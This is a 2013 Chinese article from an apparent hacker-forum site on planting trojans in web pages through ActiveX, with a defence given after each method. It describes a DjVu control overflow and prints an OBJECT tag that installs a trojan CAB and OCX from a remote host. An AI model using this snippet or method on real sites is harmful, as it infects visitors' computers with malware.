您现在的位置: 主页 > 黑客联盟 > QQ黑客 > 文章内容

浅析网页挂马ActiveX挂马攻防战

作者: 黑客联盟 来源:未知 时间: 2013-05-02 阅读:
浅析网页挂马ActiveX挂马攻防战

  方法1:通过漏洞挂马

  攻黑客利用ActiveX进行网页挂马,最常见的方法就是利用那些有漏洞的ActiveX控件进行挂马,通过用户系统内已有的ActiveX控件的触发,让木马在不知不觉中植入用户的电脑。

  其中利用软件ActiveX漏洞发动攻击的着名例子有Flash和RealPlayer的ActiveX漏洞挂马程序,这些软件的ActiveX漏洞都曾经造成了极大的危害,特别是RealPlayer至今仍然有黑客在使用它的ActiveX漏洞进行挂马。

  下面以DjVu ActiveX控件漏洞为例讲解挂马的具体步骤,首先将恶意代码输入到写字板中,然后另存为任意的htm文件,然后利用IFRAME代码将生成的htm文件嵌入到正常的网页中,此时输入网址打开含有DjVu ActiveX控件漏洞的网页,本机的计算器程序就会被触发开启。而黑客通常不会这么善良,他们会将Shellcode代码修改成下载指定恶意程序的代码,然后让用户在打开相关网站后中招。

  小百科:DjVu ActiveX控件是用于压缩图形文件的工具,它在处理超长的ImageURL属性参数时会出现溢出。

  防对于利用ActiveX漏洞来进行挂马的行为,最好的防范方法是使用IE之外的浏览器,例如Firefox、Maxthon或360安全浏览器。此外,最好能够安装防挂马软件。

  方法2:编写ActiveX木马

  攻ActiveX木马是利用一些用户盲目地点击网页上弹出的ActiveX询问安装按钮的习惯而进行传播的。许多用户往往并不能够分辨出哪些ActiveX控件是无害的,哪些ActiveX控件是有害的。

  那些ActiveX木马会打着视频聊天、美女图库等诱惑性的幌子,一些经不起诱惑的用户就会冲动性地安装网页中的ActiveX木马。

  编写ActiveX木马,需要一定的编程基础,而且整个过程相当复杂,由于版面的原因,这里只向各位想成为安全工程师的朋友简单阐述一下ActiveX木马的大致编写过程。

  首先黑客会编写一个具有Download或者其他恶意功能的OCX控件,这是ActiveX木马的核心和灵魂,然后黑客会再编写一个Setup安全设置的INF文件,用CAB压缩工具,例如WinCAB,将两个文件压缩打包成一个CAB文件。

  最后黑客将该文件上传到自己的网站中,并在网页中写入调用安装ActiveX控件的代码即可开张等待浏览该网页的用户上钩。

  调用代码如下:

 

<OBJECT classid=clsid:68ADAF59-76C1-4561-A45A-867F43545237

  codeBase=http://192.168.1.1/web/setup.cab#version=1,0,0,0>

  <PARAM NAME=“Setup” VALUE=“http:// 192.168.1.1/web/download.ocx”>

   </OBJECT>

 

  这样的ActiveX木马是没有签名验证的,通常不会被允许安装,但是仍然有方法可以突破这些安全限制。

  防要避免ActiveX木马的攻击只要禁止ActiveX木马被调用运行就可以了。

  防范此种方式挂马的最好方法还是在客户终端机上操作,在客户终端机运行IE浏览器,点击“工具→Internet选项→安全→自定义级别”,将安全级别定义为“高”,对“ActiveX控件和插件”中第2项、第3项设置为“禁用”,其他项设置为“提示”,之后点击“确定”。这样设置后,当你使用IE浏览网页时,就能有效避免ActiveX木马www.2425.net攻击